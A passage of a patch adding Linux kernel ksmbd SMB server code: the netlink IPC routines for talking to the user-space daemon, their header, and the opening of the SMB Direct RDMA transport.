++		return -EINVAL;
++	}
++
++	if (ksmbd_tools_pid) {
++		if (ksmbd_ipc_heartbeat_request() == 0) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		pr_err("Reconnect to a new user space daemon\n");
++	} else {
++		struct ksmbd_startup_request *req;
++
++		req = nla_data(info->attrs[info->genlhdr->cmd]);
++		ret = ipc_server_config_on_startup(req);
++		if (ret)
++			goto out;
++		server_queue_ctrl_init_work();
++	}
++
++	ksmbd_tools_pid = info->snd_portid;
++	ipc_update_last_active();
++
++out:
++	mutex_unlock(&startup_lock);
++	return ret;
++}
++
++static int handle_unsupported_event(struct sk_buff *skb, struct genl_info *info)
++{
++	pr_err("Unknown IPC event: %d, ignore.\n", info->genlhdr->cmd);
++	return -EINVAL;
++}
++
++static int handle_generic_event(struct sk_buff *skb, struct genl_info *info)
++{
++	void *payload;
++	int sz;
++	int type = info->genlhdr->cmd;
++
++#ifdef CONFIG_SMB_SERVER_CHECK_CAP_NET_ADMIN
++	if (!netlink_capable(skb, CAP_NET_ADMIN))
++		return -EPERM;
++#endif
++
++	if (type >= KSMBD_EVENT_MAX) {
++		WARN_ON(1);
++		return -EINVAL;
++	}
++
++	if (!ksmbd_ipc_validate_version(info))
++		return -EINVAL;
++
++	if (!info->attrs[type])
++		return -EINVAL;
++
++	payload = nla_data(info->attrs[info->genlhdr->cmd]);
++	sz = nla_len(info->attrs[info->genlhdr->cmd]);
++	return handle_response(type, payload, sz);
++}
++
++static int ipc_msg_send(struct ksmbd_ipc_msg *msg)
++{
++	struct genlmsghdr *nlh;
++	struct sk_buff *skb;
++	int ret = -EINVAL;
++
++	if (!ksmbd_tools_pid)
++		return ret;
++
++	skb = genlmsg_new(msg->sz, GFP_KERNEL);
++	if (!skb)
++		return -ENOMEM;
++
++	nlh = genlmsg_put(skb, 0, 0, &ksmbd_genl_family, 0, msg->type);
++	if (!nlh)
++		goto out;
++
++	ret = nla_put(skb, msg->type, msg->sz, msg->payload);
++	if (ret) {
++		genlmsg_cancel(skb, nlh);
++		goto out;
++	}
++
++	genlmsg_end(skb, nlh);
++	ret = genlmsg_unicast(&init_net, skb, ksmbd_tools_pid);
++	if (!ret)
++		ipc_update_last_active();
++	return ret;
++
++out:
++	nlmsg_free(skb);
++	return ret;
++}
++
++static void *ipc_msg_send_request(struct ksmbd_ipc_msg *msg, unsigned int handle)
++{
++	struct ipc_msg_table_entry entry;
++	int ret;
++
++	if ((int)handle < 0)
++		return NULL;
++
++	entry.type = msg->type;
++	entry.response = NULL;
++	init_waitqueue_head(&entry.wait);
++
++	down_write(&ipc_msg_table_lock);
++	entry.handle = handle;
++	hash_add(ipc_msg_table, &entry.ipc_table_hlist, entry.handle);
++	up_write(&ipc_msg_table_lock);
++
++	ret = ipc_msg_send(msg);
++	if (ret)
++		goto out;
++
++	ret = wait_event_interruptible_timeout(entry.wait,
++					       entry.response != NULL,
++					       IPC_WAIT_TIMEOUT);
++out:
++	down_write(&ipc_msg_table_lock);
++	hash_del(&entry.ipc_table_hlist);
++	up_write(&ipc_msg_table_lock);
++	return entry.response;
++}
++
++static int ksmbd_ipc_heartbeat_request(void)
++{
++	struct ksmbd_ipc_msg *msg;
++	int ret;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_heartbeat));
++	if (!msg)
++		return -EINVAL;
++
++	msg->type = KSMBD_EVENT_HEARTBEAT_REQUEST;
++	ret = ipc_msg_send(msg);
++	ipc_msg_free(msg);
++	return ret;
++}
++
++struct ksmbd_login_response *ksmbd_ipc_login_request(const char *account)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_login_request *req;
++	struct ksmbd_login_response *resp;
++
++	if (strlen(account) >= KSMBD_REQ_MAX_ACCOUNT_NAME_SZ)
++		return NULL;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_login_request));
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_LOGIN_REQUEST;
++	req = (struct ksmbd_login_request *)msg->payload;
++	req->handle = ksmbd_acquire_id(&ipc_ida);
++	strscpy(req->account, account, KSMBD_REQ_MAX_ACCOUNT_NAME_SZ);
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_handle_free(req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_spnego_authen_response *
++ksmbd_ipc_spnego_authen_request(const char *spnego_blob, int blob_len)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_spnego_authen_request *req;
++	struct ksmbd_spnego_authen_response *resp;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_spnego_authen_request) +
++			blob_len + 1);
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST;
++	req = (struct ksmbd_spnego_authen_request *)msg->payload;
++	req->handle = ksmbd_acquire_id(&ipc_ida);
++	req->spnego_blob_len = blob_len;
++	memcpy(req->spnego_blob, spnego_blob, blob_len);
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_handle_free(req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_tree_connect_response *
++ksmbd_ipc_tree_connect_request(struct ksmbd_session *sess,
++			       struct ksmbd_share_config *share,
++			       struct ksmbd_tree_connect *tree_conn,
++			       struct sockaddr *peer_addr)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_tree_connect_request *req;
++	struct ksmbd_tree_connect_response *resp;
++
++	if (strlen(user_name(sess->user)) >= KSMBD_REQ_MAX_ACCOUNT_NAME_SZ)
++		return NULL;
++
++	if (strlen(share->name) >= KSMBD_REQ_MAX_SHARE_NAME)
++		return NULL;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_tree_connect_request));
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_TREE_CONNECT_REQUEST;
++	req = (struct ksmbd_tree_connect_request *)msg->payload;
++
++	req->handle = ksmbd_acquire_id(&ipc_ida);
++	req->account_flags = sess->user->flags;
++	req->session_id = sess->id;
++	req->connect_id = tree_conn->id;
++	strscpy(req->account, user_name(sess->user), KSMBD_REQ_MAX_ACCOUNT_NAME_SZ);
++	strscpy(req->share, share->name, KSMBD_REQ_MAX_SHARE_NAME);
++	snprintf(req->peer_addr, sizeof(req->peer_addr), "%pIS", peer_addr);
++
++	if (peer_addr->sa_family == AF_INET6)
++		req->flags |= KSMBD_TREE_CONN_FLAG_REQUEST_IPV6;
++	if (test_session_flag(sess, CIFDS_SESSION_FLAG_SMB2))
++		req->flags |= KSMBD_TREE_CONN_FLAG_REQUEST_SMB2;
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_handle_free(req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++int ksmbd_ipc_tree_disconnect_request(unsigned long long session_id,
++				      unsigned long long connect_id)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_tree_disconnect_request *req;
++	int ret;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_tree_disconnect_request));
++	if (!msg)
++		return -ENOMEM;
++
++	msg->type = KSMBD_EVENT_TREE_DISCONNECT_REQUEST;
++	req = (struct ksmbd_tree_disconnect_request *)msg->payload;
++	req->session_id = session_id;
++	req->connect_id = connect_id;
++
++	ret = ipc_msg_send(msg);
++	ipc_msg_free(msg);
++	return ret;
++}
++
++int ksmbd_ipc_logout_request(const char *account, int flags)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_logout_request *req;
++	int ret;
++
++	if (strlen(account) >= KSMBD_REQ_MAX_ACCOUNT_NAME_SZ)
++		return -EINVAL;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_logout_request));
++	if (!msg)
++		return -ENOMEM;
++
++	msg->type = KSMBD_EVENT_LOGOUT_REQUEST;
++	req = (struct ksmbd_logout_request *)msg->payload;
++	req->account_flags = flags;
++	strscpy(req->account, account, KSMBD_REQ_MAX_ACCOUNT_NAME_SZ);
++
++	ret = ipc_msg_send(msg);
++	ipc_msg_free(msg);
++	return ret;
++}
++
++struct ksmbd_share_config_response *
++ksmbd_ipc_share_config_request(const char *name)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_share_config_request *req;
++	struct ksmbd_share_config_response *resp;
++
++	if (strlen(name) >= KSMBD_REQ_MAX_SHARE_NAME)
++		return NULL;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_share_config_request));
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_SHARE_CONFIG_REQUEST;
++	req = (struct ksmbd_share_config_request *)msg->payload;
++	req->handle = ksmbd_acquire_id(&ipc_ida);
++	strscpy(req->share_name, name, KSMBD_REQ_MAX_SHARE_NAME);
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_handle_free(req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_rpc_command *ksmbd_rpc_open(struct ksmbd_session *sess, int handle)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_rpc_command *req;
++	struct ksmbd_rpc_command *resp;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command));
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_RPC_REQUEST;
++	req = (struct ksmbd_rpc_command *)msg->payload;
++	req->handle = handle;
++	req->flags = ksmbd_session_rpc_method(sess, handle);
++	req->flags |= KSMBD_RPC_OPEN_METHOD;
++	req->payload_sz = 0;
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_rpc_command *ksmbd_rpc_close(struct ksmbd_session *sess, int handle)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_rpc_command *req;
++	struct ksmbd_rpc_command *resp;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command));
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_RPC_REQUEST;
++	req = (struct ksmbd_rpc_command *)msg->payload;
++	req->handle = handle;
++	req->flags = ksmbd_session_rpc_method(sess, handle);
++	req->flags |= KSMBD_RPC_CLOSE_METHOD;
++	req->payload_sz = 0;
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_rpc_command *ksmbd_rpc_write(struct ksmbd_session *sess, int handle,
++					  void *payload, size_t payload_sz)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_rpc_command *req;
++	struct ksmbd_rpc_command *resp;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command) + payload_sz + 1);
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_RPC_REQUEST;
++	req = (struct ksmbd_rpc_command *)msg->payload;
++	req->handle = handle;
++	req->flags = ksmbd_session_rpc_method(sess, handle);
++	req->flags |= rpc_context_flags(sess);
++	req->flags |= KSMBD_RPC_WRITE_METHOD;
++	req->payload_sz = payload_sz;
++	memcpy(req->payload, payload, payload_sz);
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_rpc_command *ksmbd_rpc_read(struct ksmbd_session *sess, int handle)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_rpc_command *req;
++	struct ksmbd_rpc_command *resp;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command));
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_RPC_REQUEST;
++	req = (struct ksmbd_rpc_command *)msg->payload;
++	req->handle = handle;
++	req->flags = ksmbd_session_rpc_method(sess, handle);
++	req->flags |= rpc_context_flags(sess);
++	req->flags |= KSMBD_RPC_READ_METHOD;
++	req->payload_sz = 0;
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_rpc_command *ksmbd_rpc_ioctl(struct ksmbd_session *sess, int handle,
++					  void *payload, size_t payload_sz)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_rpc_command *req;
++	struct ksmbd_rpc_command *resp;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command) + payload_sz + 1);
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_RPC_REQUEST;
++	req = (struct ksmbd_rpc_command *)msg->payload;
++	req->handle = handle;
++	req->flags = ksmbd_session_rpc_method(sess, handle);
++	req->flags |= rpc_context_flags(sess);
++	req->flags |= KSMBD_RPC_IOCTL_METHOD;
++	req->payload_sz = payload_sz;
++	memcpy(req->payload, payload, payload_sz);
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_rpc_command *ksmbd_rpc_rap(struct ksmbd_session *sess, void *payload,
++					size_t payload_sz)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_rpc_command *req;
++	struct ksmbd_rpc_command *resp;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command) + payload_sz + 1);
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_RPC_REQUEST;
++	req = (struct ksmbd_rpc_command *)msg->payload;
++	req->handle = ksmbd_acquire_id(&ipc_ida);
++	req->flags = rpc_context_flags(sess);
++	req->flags |= KSMBD_RPC_RAP_METHOD;
++	req->payload_sz = payload_sz;
++	memcpy(req->payload, payload, payload_sz);
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_handle_free(req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++static int __ipc_heartbeat(void)
++{
++	unsigned long delta;
++
++	if (!ksmbd_server_running())
++		return 0;
++
++	if (time_after(jiffies, server_conf.ipc_last_active)) {
++		delta = (jiffies - server_conf.ipc_last_active);
++	} else {
++		ipc_update_last_active();
++		schedule_delayed_work(&ipc_timer_work,
++				      server_conf.ipc_timeout);
++		return 0;
++	}
++
++	if (delta < server_conf.ipc_timeout) {
++		schedule_delayed_work(&ipc_timer_work,
++				      server_conf.ipc_timeout - delta);
++		return 0;
++	}
++
++	if (ksmbd_ipc_heartbeat_request() == 0) {
++		schedule_delayed_work(&ipc_timer_work,
++				      server_conf.ipc_timeout);
++		return 0;
++	}
++
++	mutex_lock(&startup_lock);
++	WRITE_ONCE(server_conf.state, SERVER_STATE_RESETTING);
++	server_conf.ipc_last_active = 0;
++	ksmbd_tools_pid = 0;
++	pr_err("No IPC daemon response for %lus\n", delta / HZ);
++	mutex_unlock(&startup_lock);
++	return -EINVAL;
++}
++
++static void ipc_timer_heartbeat(struct work_struct *w)
++{
++	if (__ipc_heartbeat())
++		server_queue_ctrl_reset_work();
++}
++
++int ksmbd_ipc_id_alloc(void)
++{
++	return ksmbd_acquire_id(&ipc_ida);
++}
++
++void ksmbd_rpc_id_free(int handle)
++{
++	ksmbd_release_id(&ipc_ida, handle);
++}
++
++void ksmbd_ipc_release(void)
++{
++	cancel_delayed_work_sync(&ipc_timer_work);
++	genl_unregister_family(&ksmbd_genl_family);
++}
++
++void ksmbd_ipc_soft_reset(void)
++{
++	mutex_lock(&startup_lock);
++	ksmbd_tools_pid = 0;
++	cancel_delayed_work_sync(&ipc_timer_work);
++	mutex_unlock(&startup_lock);
++}
++
++int ksmbd_ipc_init(void)
++{
++	int ret = 0;
++
++	ksmbd_nl_init_fixup();
++	INIT_DELAYED_WORK(&ipc_timer_work, ipc_timer_heartbeat);
++
++	ret = genl_register_family(&ksmbd_genl_family);
++	if (ret) {
++		pr_err("Failed to register KSMBD netlink interface %d\n", ret);
++		cancel_delayed_work_sync(&ipc_timer_work);
++	}
++
++	return ret;
++}
+diff --git a/fs/smb/server/transport_ipc.h b/fs/smb/server/transport_ipc.h
+new file mode 100644
+index 0000000000000..5e5b90a0c1879
+--- /dev/null
++++ b/fs/smb/server/transport_ipc.h
+@@ -0,0 +1,47 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_TRANSPORT_IPC_H__
++#define __KSMBD_TRANSPORT_IPC_H__
++
++#include <linux/wait.h>
++
++#define KSMBD_IPC_MAX_PAYLOAD	4096
++
++struct ksmbd_login_response *
++ksmbd_ipc_login_request(const char *account);
++
++struct ksmbd_session;
++struct ksmbd_share_config;
++struct ksmbd_tree_connect;
++struct sockaddr;
++
++struct ksmbd_tree_connect_response *
++ksmbd_ipc_tree_connect_request(struct ksmbd_session *sess,
++			       struct ksmbd_share_config *share,
++			       struct ksmbd_tree_connect *tree_conn,
++			       struct sockaddr *peer_addr);
++int ksmbd_ipc_tree_disconnect_request(unsigned long long session_id,
++				      unsigned long long connect_id);
++int ksmbd_ipc_logout_request(const char *account, int flags);
++struct ksmbd_share_config_response *
++ksmbd_ipc_share_config_request(const char *name);
++struct ksmbd_spnego_authen_response *
++ksmbd_ipc_spnego_authen_request(const char *spnego_blob, int blob_len);
++int ksmbd_ipc_id_alloc(void);
++void ksmbd_rpc_id_free(int handle);
++struct ksmbd_rpc_command *ksmbd_rpc_open(struct ksmbd_session *sess, int handle);
++struct ksmbd_rpc_command *ksmbd_rpc_close(struct ksmbd_session *sess, int handle);
++struct ksmbd_rpc_command *ksmbd_rpc_write(struct ksmbd_session *sess, int handle,
++					  void *payload, size_t payload_sz);
++struct ksmbd_rpc_command *ksmbd_rpc_read(struct ksmbd_session *sess, int handle);
++struct ksmbd_rpc_command *ksmbd_rpc_ioctl(struct ksmbd_session *sess, int handle,
++					  void *payload, size_t payload_sz);
++struct ksmbd_rpc_command *ksmbd_rpc_rap(struct ksmbd_session *sess, void *payload,
++					size_t payload_sz);
++void ksmbd_ipc_release(void);
++void ksmbd_ipc_soft_reset(void);
++int ksmbd_ipc_init(void);
++#endif /* __KSMBD_TRANSPORT_IPC_H__ */
+diff --git a/fs/smb/server/transport_rdma.c b/fs/smb/server/transport_rdma.c
+new file mode 100644
+index 0000000000000..c06efc020bd95
+--- /dev/null
++++ b/fs/smb/server/transport_rdma.c
+@@ -0,0 +1,2273 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2017, Microsoft Corporation.
++ *   Copyright (C) 2018, LG Electronics.
++ *
++ *   Author(s): Long Li <longli@microsoft.com>,
++ *		Hyunchul Lee <hyc.lee@gmail.com>
++ */
++
++#define SUBMOD_NAME	"smb_direct"
++
++#include <linux/kthread.h>
++#include <linux/list.h>
++#include <linux/mempool.h>
++#include <linux/highmem.h>
++#include <linux/scatterlist.h>
++#include <rdma/ib_verbs.h>
++#include <rdma/rdma_cm.h>
++#include <rdma/rw.h>
++
++#include "glob.h"
++#include "connection.h"
++#include "smb_common.h"
++#include "smbstatus.h"
++#include "transport_rdma.h"
++
++#define SMB_DIRECT_PORT_IWARP		5445
++#define SMB_DIRECT_PORT_INFINIBAND	445
++
++#define SMB_DIRECT_VERSION_LE		cpu_to_le16(0x0100)
++
++/* SMB_DIRECT negotiation timeout in seconds */
++#define SMB_DIRECT_NEGOTIATE_TIMEOUT		120
++
++#define SMB_DIRECT_MAX_SEND_SGES		6
++#define SMB_DIRECT_MAX_RECV_SGES		1
++
++/*
++ * Default maximum number of RDMA read/write outstanding on this connection
++ * This value is possibly decreased during QP creation on hardware limit
++ */
++#define SMB_DIRECT_CM_INITIATOR_DEPTH		8
++
++/* Maximum number of retries on data transfer operations */
++#define SMB_DIRECT_CM_RETRY			6
++/* No need to retry on Receiver Not Ready since SMB_DIRECT manages credits */
++#define SMB_DIRECT_CM_RNR_RETRY		0
++
++/*
++ * User configurable initial values per SMB_DIRECT transport connection
++ * as defined in [MS-SMBD] 3.1.1.1
++ * Those may change after a SMB_DIRECT negotiation
++ */
++
++/* Set 445 port to SMB Direct port by default */
++static int smb_direct_port = SMB_DIRECT_PORT_INFINIBAND;
++
++/* The local peer's maximum number of credits to grant to the peer */
++static int smb_direct_receive_credit_max = 255;
++
++/* The remote peer's credit request of local peer */
++static int smb_direct_send_credit_target = 255;
++
++/* The maximum single message size can be sent to remote peer */
++static int smb_direct_max_send_size = 1364;
++
++/*  The maximum fragmented upper-layer payload receive size supported */
++static int smb_direct_max_fragmented_recv_size = 1024 * 1024;
++
++/*  The maximum single-message size which can be received */
++static int smb_direct_max_receive_size = 1364;
++
++static int smb_direct_max_read_write_size = SMBD_DEFAULT_IOSIZE;
++
++static LIST_HEAD(smb_direct_device_list);
++static DEFINE_RWLOCK(smb_direct_device_lock);
++
++struct smb_direct_device {
++	struct ib_device	*ib_dev;
++	struct list_head	list;
++};
++
++static struct smb_direct_listener {
++	struct rdma_cm_id	*cm_id;
++} smb_direct_listener;
++
++static struct workqueue_struct *smb_direct_wq;
++
++enum smb_direct_status {
++	SMB_DIRECT_CS_NEW = 0,
++	SMB_DIRECT_CS_CONNECTED,
++	SMB_DIRECT_CS_DISCONNECTING,
++	SMB_DIRECT_CS_DISCONNECTED,
++};
++
++struct smb_direct_transport {
++	struct ksmbd_transport	transport;
++
++	enum smb_direct_status	status;
++	bool			full_packet_received;
++	wait_queue_head_t	wait_status;
++
++	struct rdma_cm_id	*cm_id;
++	struct ib_cq		*send_cq;
++	struct ib_cq		*recv_cq;
++	struct ib_pd		*pd;
++	struct ib_qp		*qp;
++
++	int			max_send_size;
++	int			max_recv_size;
++	int			max_fragmented_send_size;
++	int			max_fragmented_recv_size;
++	int			max_rdma_rw_size;
++
++	spinlock_t		reassembly_queue_lock;
++	struct list_head	reassembly_queue;
++	int			reassembly_data_length;
++	int			reassembly_queue_length;
++	int			first_entry_offset;
++	wait_queue_head_t	wait_reassembly_queue;
++
++	spinlock_t		receive_credit_lock;
++	int			recv_credits;
++	int			count_avail_recvmsg;
++	int			recv_credit_max;
++	int			recv_credit_target;
++
++	spinlock_t		recvmsg_queue_lock;
++	struct list_head	recvmsg_queue;
++
++	spinlock_t		empty_recvmsg_queue_lock;
++	struct list_head	empty_recvmsg_queue;
++
++	int			send_credit_target;
++	atomic_t		send_credits;
++	spinlock_t		lock_new_recv_credits;
++	int			new_recv_credits;
++	int			max_rw_credits;
++	int			pages_per_rw_credit;
++	atomic_t		rw_credits;
++
++	wait_queue_head_t	wait_send_credits;
++	wait_queue_head_t	wait_rw_credits;
++
++	mempool_t		*sendmsg_mempool;
++	struct kmem_cache	*sendmsg_cache;
++	mempool_t		*recvmsg_mempool;
++	struct kmem_cache	*recvmsg_cache;
++
++	wait_queue_head_t	wait_send_pending;
++	atomic_t		send_pending;
++
++	struct delayed_work	post_recv_credits_work;
++	struct work_struct	send_immediate_work;
++	struct work_struct	disconnect_work;
++
++	bool			negotiation_requested;
++};
++
++#define KSMBD_TRANS(t) ((struct ksmbd_transport *)&((t)->transport))
++
++enum {
++	SMB_DIRECT_MSG_NEGOTIATE_REQ = 0,
++	SMB_DIRECT_MSG_DATA_TRANSFER
++};
++
++static struct ksmbd_transport_ops ksmbd_smb_direct_transport_ops;
++
++struct smb_direct_send_ctx {
++	struct list_head	msg_list;
++	int			wr_cnt;
++	bool			need_invalidate_rkey;
++	unsigned int		remote_key;
++};
++
++struct smb_direct_sendmsg {
++	struct smb_direct_transport	*transport;
++	struct ib_send_wr	wr;
++	struct list_head	list;
++	int			num_sge;
++	struct ib_sge		sge[SMB_DIRECT_MAX_SEND_SGES];
++	struct ib_cqe		cqe;
++	u8			packet[];
++};
++
++struct smb_direct_recvmsg {
++	struct smb_direct_transport	*transport;
++	struct list_head	list;
++	int			type;
++	struct ib_sge		sge;
++	struct ib_cqe		cqe;
++	bool			first_segment;
++	u8			packet[];
++};
++
++struct smb_direct_rdma_rw_msg {
++	struct smb_direct_transport	*t;
++	struct ib_cqe		cqe;
++	int			status;
++	struct completion	*completion;
++	struct list_head	list;
++	struct rdma_rw_ctx	rw_ctx;
++	struct sg_table		sgt;
++	struct scatterlist	sg_list[];
++};
++
++void init_smbd_max_io_size(unsigned int sz)
++{
++	sz = clamp_val(sz, SMBD_MIN_IOSIZE, SMBD_MAX_IOSIZE);
++	smb_direct_max_read_write_size = sz;
++}
++
++unsigned int get_smbd_max_read_write_size(void)
++{
++	return smb_direct_max_read_write_size;
++}
++
++static inline int get_buf_page_count(void *buf, int size)
++{
++	return DIV_ROUND_UP((uintptr_t)buf + size, PAGE_SIZE) -
++		(uintptr_t)buf / PAGE_SIZE;
++}
++
++static void smb_direct_destroy_pools(struct smb_direct_transport *transport);
++static void smb_direct_post_recv_credits(struct work_struct *work);
++static int smb_direct_post_send_data(struct smb_direct_transport *t,
++				     struct smb_direct_send_ctx *send_ctx,
++				     struct kvec *iov, int niov,
++				     int remaining_data_length);
++
++static inline struct smb_direct_transport *
++smb_trans_direct_transfort(struct ksmbd_transport *t)
++{
++	return container_of(t, struct smb_direct_transport, transport);
++}
++
++static inline void
++*smb_direct_recvmsg_payload(struct smb_direct_recvmsg *recvmsg)
++{
++	return (void *)recvmsg->packet;
++}
++
++static inline bool is_receive_credit_post_required(int receive_credits,
++						   int avail_recvmsg_count)
++{
++	return receive_credits <= (smb_direct_receive_credit_max >> 3) &&
++		avail_recvmsg_count >= (receive_credits >> 2);
++}
++
++static struct
++smb_direct_recvmsg *get_free_recvmsg(struct smb_direct_transport *t)
++{
++	struct smb_direct_recvmsg *recvmsg = NULL;
++
++	spin_lock(&t->recvmsg_queue_lock);
++	if (!list_empty(&t->recvmsg_queue)) {
++		recvmsg = list_first_entry(&t->recvmsg_queue,
++					   struct smb_direct_recvmsg,
++					   list);
++		list_del(&recvmsg->list);
++	}
++	spin_unlock(&t->recvmsg_queue_lock);
++	return recvmsg;
++}
++
++static void put_recvmsg(struct smb_direct_transport *t,
++			struct smb_direct_recvmsg *recvmsg)
++{
++	ib_dma_unmap_single(t->cm_id->device, recvmsg->sge.addr,
++			    recvmsg->sge.length, DMA_FROM_DEVICE);
++
++	spin_lock(&t->recvmsg_queue_lock);
++	list_add(&recvmsg->list, &t->recvmsg_queue);
++	spin_unlock(&t->recvmsg_queue_lock);
++}
++
++static struct
++smb_direct_recvmsg *get_empty_recvmsg(struct smb_direct_transport *t)
++{
++	struct smb_direct_recvmsg *recvmsg = NULL;
++
++	spin_lock(&t->empty_recvmsg_queue_lock);
++	if (!list_empty(&t->empty_recvmsg_queue)) {
++		recvmsg = list_first_entry(&t->empty_recvmsg_queue,
++					   struct smb_direct_recvmsg, list);
++		list_del(&recvmsg->list);
++	}
++	spin_unlock(&t->empty_recvmsg_queue_lock);
++	return recvmsg;
++}
++
++static void put_empty_recvmsg(struct smb_direct_transport *t,
++			      struct smb_direct_recvmsg *recvmsg)
++{
++	ib_dma_unmap_single(t->cm_id->device, recvmsg->sge.addr,
++			    recvmsg->sge.length, DMA_FROM_DEVICE);
++
++	spin_lock(&t->empty_recvmsg_queue_lock);
++	list_add_tail(&recvmsg->list, &t->empty_recvmsg_queue);
++	spin_unlock(&t->empty_recvmsg_queue_lock);
++}
++
++static void enqueue_reassembly(struct smb_direct_transport *t,
++			       struct smb_direct_recvmsg *recvmsg,
++			       int data_length)
++{
++	spin_lock(&t->reassembly_queue_lock);
++	list_add_tail(&recvmsg->list, &t->reassembly_queue);
++	t->reassembly_queue_length++;
++	/*
++	 * Make sure reassembly_data_length is updated after list and
++	 * reassembly_queue_length are updated. On the dequeue side
++	 * reassembly_data_length is checked without a lock to determine
++	 * if reassembly_queue_length and list is up to date
++	 */
++	virt_wmb();
++	t->reassembly_data_length += data_length;
++	spin_unlock(&t->reassembly_queue_lock);
++}
++
++static struct smb_direct_recvmsg *get_first_reassembly(struct smb_direct_transport *t)
++{
++	if (!list_empty(&t->reassembly_queue))
++		return list_first_entry(&t->reassembly_queue,
++				struct smb_direct_recvmsg, list);
++	else
++		return NULL;
++}
++
++static void smb_direct_disconnect_rdma_work(struct work_struct *work)
++{
++	struct smb_direct_transport *t =
++		container_of(work, struct smb_direct_transport,
++			     disconnect_work);
++
++	if (t->status == SMB_DIRECT_CS_CONNECTED) {
++		t->status = SMB_DIRECT_CS_DISCONNECTING;
++		rdma_disconnect(t->cm_id);
++	}
++}
++
++static void
++smb_direct_disconnect_rdma_connection(struct smb_direct_transport *t)
++{
++	if (t->status == SMB_DIRECT_CS_CONNECTED)
++		queue_work(smb_direct_wq, &t->disconnect_work);
++}
++
++static void smb_direct_send_immediate_work(struct work_struct *work)
++{
++	struct smb_direct_transport *t = container_of(work,
++			struct smb_direct_transport, send_immediate_work);
++
++	if (t->status != SMB_DIRECT_CS_CONNECTED)
++		return;
++
++	smb_direct_post_send_data(t, NULL, NULL, 0, 0);
++}
++
++static struct smb_direct_transport *alloc_transport(struct rdma_cm_id *cm_id)
++{
++	struct smb_direct_transport *t;
++	struct ksmbd_conn *conn;
++
++	t = kzalloc(sizeof(*t), GFP_KERNEL);
++	if (!t)
++		return NULL;
++
++	t->cm_id = cm_id;
++	cm_id->context = t;
++
++	t->status = SMB_DIRECT_CS_NEW;
++	init_waitqueue_head(&t->wait_status);
++
++	spin_lock_init(&t->reassembly_queue_lock);
++	INIT_LIST_HEAD(&t->reassembly_queue);
++	t->reassembly_data_length = 0;
++	t->reassembly_queue_length = 0;
++	init_waitqueue_head(&t->wait_reassembly_queue);
++	init_waitqueue_head(&t->wait_send_credits);
++	init_waitqueue_head(&t->wait_rw_credits);
++
++	spin_lock_init(&t->receive_credit_lock);
++	spin_lock_init(&t->recvmsg_queue_lock);
++	INIT_LIST_HEAD(&t->recvmsg_queue);
++
++	spin_lock_init(&t->empty_recvmsg_queue_lock);
++	INIT_LIST_HEAD(&t->empty_recvmsg_queue);
++
++	init_waitqueue_head(&t->wait_send_pending);
++	atomic_set(&t->send_pending, 0);
++
